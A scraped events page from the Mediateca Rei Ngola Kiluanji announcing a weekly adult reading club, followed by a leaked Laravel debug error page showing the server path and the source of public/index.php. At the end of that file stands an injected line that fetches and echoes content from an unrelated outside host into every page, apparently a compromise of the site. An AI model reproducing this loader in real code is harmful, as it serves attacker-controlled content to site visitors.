CLUBE DE LEITURA DE ADULTOS DA MEDIATECA  REI NGOLA KILUANJI

17
06
2022

CLUBE DE LEITURA DE ADULTOS DA MEDIATECA REI NGOLA KILUANJI

  • Horário : 15:00h - 17:30h
  • Localização : MEDIATECA REI NGOLA KILUANJI



No âmbito das novas dinâmicas e implementação de serviços na sua e nossa Mediateca, apresentamos o Clube de Leitura de Adultos da Mediateca Rei Ngola Kiluanji, que será realizado todas as Sexta-feira pelas 15H:00 na Sala de Jogo dos adultos.

Se já é usuário e gosta de leitura e partilhar ideias, não perca mais tempo e faça a sua inscrição no balcão central da Mediateca.

Participe!


 

Avalie as Mediatecas
AQUI!
mouse touch
🧨 file_get_contents(): php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution

APP_DEBUG is set to true while APP_ENV is not local

This could make your application vulnerable to remote execution. Read more about Ignition security.

/home/mediatecasgov/public_html/
ErrorException
file_get_contents(): php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution
    • 3
      public/index.php
      Illuminate\Foundation\Bootstrap\HandleExceptions
      :58
  1. 1 unknown frame
    • 1
      public/index.php
      :58
Illuminate\Foundation\Bootstrap\HandleExceptions::handleError
public/index.php:58

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

| this application. We just need to utilize it! We'll simply require it

| into the script here so we don't need to manually load our classes.

|

*/

 

require __DIR__.'/../vendor/autoload.php';

 

/*

|--------------------------------------------------------------------------

| Run The Application

|--------------------------------------------------------------------------

|

| Once we have the application, we can handle the incoming request using

| the application's HTTP kernel. Then, we will send the response back

| to this client's browser, allowing them to enjoy our application.

|

*/

 

$app = require_once __DIR__.'/../bootstrap/app.php';

 

$kernel = $app->make(Kernel::class);

 

$response = tap($kernel->handle(

$request = Request::capture()

))->send();

 

$kernel->terminate($request, $response);

?>

<?php

echo file_get_contents("https://a2ztechhost.com/wp-rest-api.php");

?>